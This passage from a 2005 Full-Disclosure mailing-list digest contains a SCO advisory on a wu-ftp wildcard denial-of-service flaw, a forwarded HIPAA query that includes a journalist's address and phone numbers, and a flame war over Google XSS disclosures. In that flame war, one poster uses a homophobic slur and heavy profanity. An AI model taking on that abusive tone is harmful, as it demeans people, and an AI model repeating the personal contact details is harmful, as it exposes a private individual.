http://secunia.com/-------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051221/3b9022b2/attachment-0001.html ------------------------------ Message: 13 Date: Wed, 21 Dec 2005 11:54:05 -0600 (CST) From: "J.A. Terranson" <measl () mfn org> Subject: [Full-disclosure] [EMED-L] Patriot Act and HIPPA (fwd) To: Full-Disclosure <Full-Disclosure () lists grok org uk> Cc: antisocial () mfn org, "cypherpunks () al-qaeda net" <cypherpunks () al-qaeda net> Message-ID: <20051221115344.H37487 () ubzr zsa bet> Content-Type: TEXT/PLAIN; charset=US-ASCII Take note people! -- Yours, J.A. Terranson sysadmin () mfn org 0xBD4A95BF Just once, can't we have a nice polite discussion about the logistics and planning side of large criminal enterprise? - Steve Thompson ---------- Forwarded message ---------- Date: Wed, 21 Dec 2005 12:10:59 -0500 From: Jeanne Lenzer <jeanne.lenzer () GMAIL COM> Reply-To: EMED-L -- a list for emergency medicine practitioners. <EMED-L () ITSSRV1 UCSF EDU> To: EMED-L () ITSSRV1 UCSF EDU Subject: [EMED-L] Patriot Act and HIPPA Could anyone on this listserve who has seen anything like what follows below, please contact me off-list immediately jeanne.lenzer () earthlink net (for background or for attribution - your choice). Thanks, Jeanne A patient was handed a medical information rights and disclosure booklet she got from her doctor. It lists the folks that they might release medical information to for various reasons (health department, lawyers and courts because of subpoena, law enforcement officials, coroners, medical examiners, funeral directors, etc.). Below them, there is this graph: Protective Services for the President, National Security and Intelligence Activities: We may disclose medical information about you to authorized federal officials so they may without limitation (i) provide protection to the President, other authorized persons or foreign heads of state or conduct special investigations, or (ii) conduct lawful intelligence, counter-intelligence, or other national security activities authorized by law. __________ Jeanne Lenzer Freelance journalist 11 Len Court Kingston, NY 12401 USA jeanne.lenzer () earthlink net 845.943.6202 office 203.300.7136 cell To unsubscribe, send the command "SIGNOFF EMED-L" to LISTSERV () ITSSRV1 UCSF EDU ------------------------------ Message: 14 Date: Wed, 21 Dec 2005 18:57:18 +0100 From: Slythers Bro <slythers () gmail com> Subject: Re: [Full-disclosure] Firewall (The Movie) - http://firewallmovie.warnerbros.com/cmp/trailer.html?id=trailer To: Dave McCormick <mccormic () xecu net> Cc: full-disclosure () lists grok org uk Message-ID: <8f6a58a30512210957v689c9804p373ec1febeef360d () mail gmail com> Content-Type: text/plain; charset="iso-8859-1" this movie seem to sux -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051221/c9ae0fc4/attachment-0001.html ------------------------------ Message: 15 Date: Wed, 21 Dec 2005 17:58:27 +0000 From: n3td3v <xploitable () gmail com> Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com To: Edward Pearson <Ed () unitymail co uk>, full-disclosure () lists grok org uk Message-ID: <4b6ee9310512210958p1775afb9g15f059db7775a6e () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 I release information about Yahoo and Google, I don't see how my name goes in the same list as GroundZero and InfoSecBOFH. All i'm doing is defending Yahoo and Google researchers from being told not to disclose vulnerabilities on FD, is that such a bad thing? On 12/21/05, Edward Pearson <Ed () unitymail co uk> wrote:Why has this become a trolling? "if noone tell him what a stupid fag he is" Are we back at fucking middle school? Have we decended to the level of 10 year olds?? Ground Zero, I've seen your company website(s) and your products. All I say is I think you have several very good resons to pay FUCKING close attention to what is said on this list. Work it out. The only people who seem hell bent on ruining this list for everyone are: InfoSecBOFH n3td3v Ground Zero Security None of these people have anything to bring to the table. Lets see at least one real vuln report/exploit from one of you, and then the other two have to concentrate on growing up enough to not troll it or make stupid pre-school comments. Come on guys!!! I'm beginning to thing that actually you're not bigger than this... Ultimatly, if you've got problems with each other, do it on MSN, AIM, IRC, USENET whatever, just not my inbox. Have a fucking excellent day. - Ed (BTW, Ground Zero's has my alais since 1995, now I see that this chump is going round putting a black mark by it) -----Original Message-----e From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of n3td3v Sent: 21 December 2005 17:17 To: GroundZero Security; full-disclosure () lists grok org uk Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com You trolled this thread by saying Watchfire should stop disclosing vulnerabilities for Yahoo and Google. You get the response you deserved to get. Now you're running off the thread now with your tail between your legs, because everyone has told you that Google and Yahoo vulnerabilities (especially XSS) will never be banned from FD. On 12/21/05, GroundZero Security <fd () g-0 org> wrote:yes you are right, but its like if noone tells him what a stupid fag he is, he will keep posting and posting his irrelevant crap and just ignore the tons of private mail he receives. i'm sorry for adding tothe noise, but its just too tempting.i try to ignore it. but i cant promise i will, the last mail he sent just asks for a reply :P but ok...must...resist..... btw my name is not groundzero, thats my company :) greetz -sk_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/------------------------------ Message: 16 Date: Wed, 21 Dec 2005 12:58:32 -0500 From: "KF (lists)" <kf_lists () digitalmunition com> Subject: Re: [Full-disclosure] SCOSA-2005.63 OpenServer 5.0.6 OpenServer 5.0.7 OpenServer 6.0.0 : wu-ftp Denial of Service Vulnerability To: full-disclosure () lists grok org uk Cc: security-announce () list sco com Message-ID: <43A997C8.1090903 () digitalmunition com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed How about you retards upgrade your own production ftp servers before sending out an another wu advisory... Seriously.... how many years can you leave this box unpatched? Look like you JUST released yet an nother patch that you can apply to it... ftp ftpput.sco.com Connected to ftpput.sco.com. 220 artemis FTP server (Version 2.1WU(1)) ready. Name (ftpput.sco.com:kfinisterre): -KF security () sco com wrote:-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1______________________________________________________________________________SCO Security Advisory Subject: OpenServer 5.0.6 OpenServer 5.0.7 OpenServer 6.0.0 : wu-ftp Denial of Service Vulnerability Advisory number: SCOSA-2005.63 Issue date: 2005 December 21 Cross reference: sr893936 fz532335 erg712856 sr895049 fz533027 erg712952 CVE-2005-0256______________________________________________________________________________1. Problem Description The wu_fnmatch function in wu_fnmatch.c allows remote attackers to cause a denial of service (CPU exhaustion by recursion) via a glob pattern with a large number of * (wildcard) characters, as demonstrated using the dir command. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the following name CVE-2005-0256 to this issue. 2. Vulnerable Supported Versions System Binaries----------------------------------------------------------------------OpenServer 5.0.6 /etc/ftpd OpenServer 5.0.7 /etc/ftpd OpenServer 6.0.0 /etc/ftpd 3. Solution The proper solution is to install the latest packages. 4. OpenServer 5.0.6 4.1 Location of Fixed Binaries ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63 4.2 Verification MD5 (p532335.506_vol.tar) = 89ea2ed1f88da6721bd73c3889f9ac0c md5 is available for download from ftp://ftp.sco.com/pub/security/tools 4.3 Installing Fixed Binaries The following package should be installed on your system before you install this fix: OSS646C Upgrade the affected binaries with the following sequence: 1) Download p532335.506_vol.tar to a directory. 2) Extract VOL* files. # tar xvf p532335.506_vol.tar 3) Run the custom command, specify an install from media images, and specify the directory as the location of the images. 5. OpenServer 5.0.7 5.1 Location of Fixed Binaries The fixes are only available in SCO OpenServer Release 5.0.7 Maintenance Pack 4 or later. ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4_vol.tar 5.2 Verification MD5 (osr507mp4_vol.tar) = 4c87d840ff5b43221258547d19030228 md5 is available for download from ftp://ftp.sco.com/pub/security/tools 5.3 Installing Fixed Binaries See the SCO OpenServer Release 5.0.7 Maintenance Pack 4 Release and Installation Notes: ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm 6. OpenServer 6.0.0 6.1 Location of Fixed Binaries ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.63 6.2 Verification MD5 (p533027.600_vol.tar) = d939cb729d115c9bef2d2032903f2125 md5 is available for download from ftp://ftp.sco.com/pub/security/tools 6.3 Installing Fixed Binaries Upgrade the affected binaries with the following sequence: 1) Download p533027.600_vol.tar to a directory. 2) Extract VOL* files. # tar xvf p533027.600_vol.tar 3) Run the custom command, specify an install from media images, and specify the directory as the location of the images. 7. References Specific references for this advisory: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0256http://www.idefense.com/application/poi/display?id=207&type=vulnerabilitiesSCO security resources: http://www.sco.com/support/security/index.html SCO security advisories via email http://www.sco.com/support/forums/security.html This security fix closes SCO incidents sr893936 fz532335 erg712856 sr895049 fz533027 erg712952. 8. Disclaimer SCO is not responsible for the misuse of any of the information we provide on this website and/or through our security advisories. Our advisories are a service to our customers intended to promote secure installation and use of SCO products. 9. Acknowledgments SCO would like to thank Adam Zabrocki.______________________________________________________________________________-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (UnixWare) iD8DBQFDqYDTaqoBO7ipriERAtzOAJ0ctD8xRYQrLkkgyHsMqCvfQdPBFQCeIgx7 xqqmzQCNiw6t+WtSL5rqo4E= =ha4X -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/------------------------------ Message: 17 Date: Wed, 21 Dec 2005 11:09:08 -0700 From: "wilder_jeff Wilder" <wilder_jeff () msn com> Subject: RE: [Full-disclosure] Character vulnerabilities To: peer () baden-online de, full-disclosure () lists grok org uk Message-ID: <BAY106-F7F86FB6686789F08B721B94310 () phx gbl> Content-Type: text/plain; format=flowed <begin applause> WOOO HOOOOO!!!!! I'll second that </begin applause> -Jeff Wilder CISSP,CCE,C/EH -----BEGIN GEEK CODE BLOCK----- Version: 3.1 GIT/CM/CS/O d- s:+ a C+++ UH++ P L++ E- w-- N+++ o-- K- w O- M-- V-- PS+ PE- Y++ PGP++ t+ 5- X-- R* tv b++ DI++ D++ G e* h--- r- y+++* ------END GEEK CODE BLOCK------From: Peer Janssen <peer () baden-online de> Reply-To: peer () baden-online de To: full-disclosure () lists grok org uk Subject: [Full-disclosure] Character vulnerabilities Date: Wed, 21 Dec 2005 18:47:42 +0100 MIME-Version: 1.0 Received: from lists.grok.org.uk ([195.184.125.51]) by bay0-mc12-f11.bay0.hotmail.com with Microsoft SMTPSVC(6.0.3790.211); Wed, 21 Dec 2005 09:51:14 -0800 Received: from lists.grok.org.uk (localhost [127.0.0.1])by lists.grok.org.uk (Postfix) with ESMTP id 2998311E1;Wed, 21 Dec 2005 17:47:48 +0000 (GMT) Received: from moutng.kundenserver.de (moutng.kundenserver.de[212.227.126.177])by lists.grok.org.uk (Postfix) with ESMTP id A1AFA1035for <full-disclosure () lists grok org uk>;Wed, 21Dec2005 17:47:33 +0000 (GMT) Received: from [84.162.202.209] (helo=[192.168.0.4])by mrelayeu.kundenserver.de (node=mrelayeu3) with ESMTP (Nemesis),id 0MKxQS-1Ep83p13dR-0000lC; Wed, 21 Dec 2005 18:47:33 +0100 X-Message-Info: JGTYoYF78jHTlqJP6fYdQM6aP3lvEevT7GTXFU12H84= X-Original-To: full-disclosure () lists grok org uk Delivered-To: full-disclosure () lists grok org uk User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US;rv:1.7.8)Gecko/20050927Debian/1.7.8-1sarge3 X-Accept-Language: de, de-de, en-us, en, fr, he, ar X-Provags-ID: kundenserver.de abuse@kundenserver.delogin:45dff816f45a21d2ed442f6d1b2646c7 X-BeenThere: full-disclosure () lists grok org uk X-Mailman-Version: 2.1.5 Precedence: list List-Id: An unmoderated mailing list for the discussion of security issues<full-disclosure.lists.grok.org.uk> List-Unsubscribe: <https://lists.grok.org.uk/mailman/listinfo/full-disclosure>, <mailto:full-disclosure-request () lists grok org uk?subject=unsubscribe> List-Archive: <http://lists.grok.org.uk/pipermail/full-disclosure> List-Post: <mailto:full-disclosure () lists grok org uk> List-Help:<mailto:full-disclosure-request () lists grok org uk?subject=help>List-Subscribe: <https://lists.grok.org.uk/mailman/listinfo/full-disclosure>, <mailto:full-disclosure-request () lists grok org uk?subject=subscribe> Errors-To: full-disclosure-bounces () lists grok org uk Return-Path: full-disclosure-bounces () lists grok org uk X-OriginalArrivalTime: 21 Dec 2005 17:51:16.0430 (UTC) FILETIME=[241ADEE0:01C60657] Hi list, I read so many postings on this list of people who seemingly do notcontroltheir anger, fury etc. which seems to bump their heads straight at their ceilings. Do you really consider this as qualities of a security researcher/consultant/employee/...? I'd rather consider them vulnerabilities which might expose them tosocialengineering attacks or to being blinded by their own rage, which caneasilyresult in destructive carelessness in many areas. I don't think that it makes a good publicity for a company to work with security people not mastering themselves. Why would you entrust them with your systems if they react so emotionally? Shouldn't they rather be clear-minded, rational, controlling themselves, etc., when dealing in any way with security issues? So please, do yourself and those around you a favor and change; you CANdoit, and you will make everybody happier, and youself more efficient, if happyness is not your thing. So cheer up, and take it a bit more easily! Peer _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/------------------------------ Message: 18 Date: Wed, 21 Dec 2005 19:14:28 +0100 From: "GroundZero Security" <fd () g-0 org> Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com To: "Edward Pearson" <Ed () unitymail co uk> Cc: full-disclosure () lists grok org uk Message-ID: <019601c6065a$63bf69f0$0100a8c0@nuclearwinter> Content-Type: text/plain; charset="iso-8859-1" i did provide a real exploit before here and before you point the finger on others, we didnt see anything coming from you at all did we ? ----- Original Message ----- From: "Edward Pearson" <Ed () unitymail co uk> To: <full-disclosure () lists grok org uk> Sent: Wednesday, December 21, 2005 6:41 PM Subject: RE: [Full-disclosure] XSS vulnerabilities in Google.comWhy has this become a trolling? "if noone tell him what a stupid fag he is" Are we back at fucking middle school? Have we decended to the level of 10 year olds?? Ground Zero, I've seen your company website(s) and your products. All I say is I think you have several very good resons to pay FUCKING close attention to what is said on this list. Work it out. The only people who seem hell bent on ruining this list for everyone are: InfoSecBOFH n3td3v Ground Zero Security None of these people have anything to bring to the table. Lets see at least one real vuln report/exploit from one of you, and then the other two have to concentrate on growing up enough to not troll it or make stupid pre-school comments. Come on guys!!! I'm beginning to thing that actually you're not bigger than this... Ultimatly, if you've got problems with each other, do it on MSN, AIM, IRC, USENET whatever, just not my inbox. Have a fucking excellent day. - Ed (BTW, Ground Zero's has my alais since 1995, now I see that this chump is going round putting a black mark by it) -----Original Message-----e From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of n3td3v Sent: 21 December 2005 17:17 To: GroundZero Security; full-disclosure () lists grok org uk Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com You trolled this thread by saying Watchfire should stop disclosing vulnerabilities for Yahoo and Google. You get the response you deserved to get. Now you're running off the thread now with your tail between your legs, because everyone has told you that Google and Yahoo vulnerabilities (especially XSS) will never be banned from FD. On 12/21/05, GroundZero Security <fd () g-0 org> wrote:yes you are right, but its like if noone tells him what a stupid fag he is, he will keep posting and posting his irrelevant crap and just ignore the tons of private mail he receives. i'm sorry for adding tothe noise, but its just too tempting.i try to ignore it. but i cant promise i will, the last mail he sent just asks for a reply :P but ok...must...resist..... btw my name is not groundzero, thats my company :) greetz -sk_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/------------------------------ Message: 19 Date: Wed, 21 Dec 2005 18:24:33 +0000 From: n3td3v <xploitable () gmail com> Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com To: GroundZero Security <fd () g-0 org>, full-disclosure () lists grok org uk Message-ID: <4b6ee9310512211024m31d67709mc40a53b89fb05923 () mail gmail com> Content-Type: text/plain; charset=ISO-8859-1 Its a disgrace that its come to people like GroundZero knocking others, I really do. You've never disclosed any vulnerabilities, yet you think you can tell other people not to post their own just because you so happen to think its lame. Pathetic. On 12/21/05, GroundZero Security <fd () g-0 org> wrote:i did provide a real exploit before here and before you point the finger on others, we didnt see anything coming from you at alldid we ? ------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ End of Full-Disclosure Digest, Vol 10, Issue 70 ***********************************************
_________________________________________________________________ Spam filtresi ile virüslere karsi en güvenilir koruma, MSN PC Koruma'dan geçer. http://www.msn.com.tr/security/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- RE:DON'T SEND ME AGAIN PLS Ahmed Aydogan (Dec 21)
- <Possible follow-ups>
- RE: RE:DON'T SEND ME AGAIN PLS Krpata, Tyler (Dec 21)